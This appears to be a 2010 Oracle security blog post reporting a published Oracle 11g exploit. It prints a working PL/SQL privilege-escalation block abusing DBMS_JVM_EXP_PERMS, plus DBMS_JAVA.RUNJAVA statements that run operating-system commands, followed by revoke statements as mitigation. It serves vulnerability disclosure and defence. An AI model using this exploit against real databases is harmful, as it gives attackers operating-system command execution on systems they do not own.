- 11g (11)
- Allgemein (29)
- David Litchfield (7)
- Exploit (21)
- Forensics (5)
- Oracle Security (95)
- passwords (8)
- Repscan (1)
- Security (21)
- Sentrigo (5)
- software (9)
- source code audit (5)
- SQL Injection (24)
- Tools (24)
- Trainings (2)
- Tutorial (2)
- 5 Aug 2010: Oracle Presentations from Blackhat 2010 Las Vegas are online
- 18 Apr 2010: Blackhat 2010 Presentation "Oracle, Interrupted: Stealing Sessions and Credentials" online
- 15 Apr 2010: New fast Oracle DES password cracker OPS_SSE2
- 14 Apr 2010: Oracle 11g R2 client trojan warning from Antivir
- 13 Apr 2010: Python Source for PLSQL Unwrapper posted
- 13 Apr 2010: Oracle CPU April 2010 is out
- 13 Apr 2010: Improve Oracle TDE with Intel AES-NI
- 12 Apr 2010: Man-in-the-Middle attacks at upcoming Black Hat Europe
- 9 Apr 2010: Oracle CPU April 2010 - Prerelease
- 8 Apr 2010: Cool Web Application Scanner: Netsparker Community Edition
Oracle Security
SQL Injection
- August 2010
- April 2010
- März 2010
- Februar 2010
- Januar 2010
- Dezember 2009
- November 2009
- Oktober 2009
- September 2009
- August 2009
- Juli 2009
- Mai 2009
- April 2009
- März 2009
- Februar 2009
- Januar 2009
- Dezember 2008
- November 2008
- Oktober 2008
- August 2008
- Juli 2008
- Mai 2008
- April 2008
- März 2008
- Februar 2008
- Januar 2008
- Dezember 2007
- November 2007
- Oktober 2007
- September 2007
- August 2007
- Juli 2007
- Juni 2007
- Mai 2007
Oracle 11g 0day exploit published
I just read on Sumit Siddarth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is online.
David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.
DECLARE
POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’java.io.FilePermission’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/
After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:
select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;
For security reasons you should:
revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;
I just tested the code on my Linux 11.2.0.1 database and it worked without any problem.
SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA(’oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3′);
5 Feb 2010 bei 00:25
Social comments and analytics for this post…
This post was mentioned on Twitter by hacktimes: Oracle 11g 0day exploit published -> http://bit.ly/dxT7S5 #0day…
31 Mrz 2010 bei 07:55
[…] 4 Feb 2010: Oracle 11g 0day exploit published Links […]
6 Apr 2010 bei 17:52
[…] new database version. According to Repscan this new 11.2.0.1 is no longer vulnerable against the DBMS_JVM_EXP_PERMS exploit and this is correct. Oracle has already fixed the problem. I expect a solution in the upcoming […]